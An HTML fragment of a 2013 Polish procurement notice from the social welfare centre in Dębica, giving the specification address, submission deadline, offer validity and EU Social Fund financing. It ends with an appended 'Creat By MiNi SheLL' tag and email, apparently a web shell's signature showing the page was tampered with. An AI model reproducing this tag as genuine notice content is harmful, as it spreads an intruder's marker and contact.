<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops-debica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej
ul. Akademicka 12
39-200 Dębica.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.05.2013 godzina 10:00, miejsce: Miejski Ośrodek Pomocy Społecznej
ul. Akademicka 12
39-200 Dębica 
Pok. Nr 37-Dziennik Podawczy.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt finansowany ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki Priorytet VII Promocja Integracji Społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com